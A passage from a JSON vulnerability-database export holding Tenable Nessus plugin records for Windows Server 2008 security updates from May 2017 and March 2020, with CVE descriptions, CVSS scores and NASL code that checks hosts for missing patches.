or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-03-24T00:00:00", "type": "nessus", "title": "KB4541504: Windows Server 2008 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0779", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0814", "CVE-2020-0822", "CVE-2020-0832", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0847", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0874", "CVE-2020-0877", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0887"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAR_4541506.NASL", "href": "https://www.tenable.com/plugins/nessus/134866", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134866);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0779\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0814\",\n \"CVE-2020-0822\",\n \"CVE-2020-0832\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0847\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0874\",\n \"CVE-2020-0877\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0887\"\n );\n script_xref(name:\"MSKB\", value:\"4541506\");\n script_xref(name:\"MSKB\", value:\"4541504\");\n script_xref(name:\"MSFT\", value:\"MS20-4541506\");\n script_xref(name:\"MSFT\", value:\"MS20-4541504\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4541504: Windows Server 2008 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4541504\nor cumulative update 4541506. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0880, CVE-2020-0882)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0874)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n succesfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0849)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\");\n # https://support.microsoft.com/en-us/help/4541506/windows-server-2008-update-kb4541506\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3123a7c3\");\n # https://support.microsoft.com/en-us/help/4541504/windows-server-2008-update-kb4541504\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0805ef06\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4541504 or Cumulative Update KB4541506.\n\nPlease Note: These updates are only available through Microsoft's Extended Support Updates program.\nThis operating system is otherwise unsupported.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0883\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4541506', '4541504');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4541506, 4541504])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:24", "description": "The remote Windows host is missing multiple security updates released on 2017/05/09. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows improperly handles objects in memory.\n (CVE-2017-0077)\n\n - A denial of service vulnerability exists in Windows DNS Server if the server is configured to answer version queries. An attacker who successfully exploited this vulnerability could cause the DNS Server service to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system.\n (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175, CVE-2017-0220)\n\n - An information disclosure vulnerability exists in the way some ActiveX objects are instantiated. An attacker who successfully exploited this vulnerability could gain access to protected memory contents. (CVE-2017-0242)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions. On systems with Windows 7 for x64-based Systems or later installed, this vulnerability can lead to denial of service.\n (CVE-2017-0244)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-0245)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. On computers with Windows 7 for x64-based systems or later installed, this vulnerability can lead to denial of service.\n (CVE-2017-0246)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n (CVE-2017-0258)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory.\n (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 2008 May 2017 Multiple Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0242", "CVE-2017-0244", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/100063", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100063);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0175\",\n \"CVE-2017-0190\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0242\",\n \"CVE-2017-0244\",\n \"CVE-2017-0245\",\n \"CVE-2017-0246\",\n \"CVE-2017-0258\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98108,\n 98109,\n 98110,\n 98111,\n 98112,\n 98114,\n 98115,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98275,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4018196\");\n script_xref(name:\"MSKB\", value:\"4018466\");\n script_xref(name:\"MSKB\", value:\"4018556\");\n script_xref(name:\"MSKB\", value:\"4018821\");\n script_xref(name:\"MSKB\", value:\"4018885\");\n script_xref(name:\"MSKB\", value:\"4018927\");\n script_xref(name:\"MSKB\", value:\"4019149\");\n script_xref(name:\"MSKB\", value:\"4019204\");\n script_xref(name:\"MSKB\", value:\"4019206\");\n script_xref(name:\"MSFT\", value:\"MS17-4018196\");\n script_xref(name:\"MSFT\", value:\"MS17-4018466\");\n script_xref(name:\"MSFT\", value:\"MS17-4018556\");\n script_xref(name:\"MSFT\", value:\"MS17-4018821\");\n script_xref(name:\"MSFT\", value:\"MS17-4018885\");\n script_xref(name:\"MSFT\", value:\"MS17-4018927\");\n script_xref(name:\"MSFT\", value:\"MS17-4019149\");\n script_xref(name:\"MSFT\", value:\"MS17-4019204\");\n script_xref(name:\"MSFT\", value:\"MS17-4019206\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 2008 May 2017 Multiple Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates released\non 2017/05/09. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows improperly handles objects in memory.\n (CVE-2017-0077)\n\n - A denial of service vulnerability exists in Windows DNS\n Server if the server is configured to answer version\n queries. An attacker who successfully exploited this\n vulnerability could cause the DNS Server service to\n become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system.\n (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0175, CVE-2017-0220)\n\n - An information disclosure vulnerability exists in the\n way some ActiveX objects are instantiated. An attacker\n who successfully exploited this vulnerability could gain\n access to protected memory contents. (CVE-2017-0242)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions. On systems\n with Windows 7 for x64-based Systems or later installed,\n this vulnerability can lead to denial of service.\n (CVE-2017-0244)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-0245)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. On computers\n with Windows 7 for x64-based systems or later installed,\n this vulnerability can lead to denial of service.\n (CVE-2017-0246)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-0258)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory.\n (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018196/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018466/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018556/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018821/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018885/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018927/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019149/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019204/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019206/title\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - KB4018196\n - KB4018466\n - KB4018556\n - KB4018821\n - KB4018885\n - KB4018927\n - KB4019149\n - KB4019204\n - KB4019206\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-05';\n\nkbs = make_list(\n \"4018196\", \n \"4018466\",\n \"4018556\",\n \"4018821\",\n \"4018885\",\n \"4018927\",\n \"4019149\",\n \"4019204\",\n \"4019206\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) 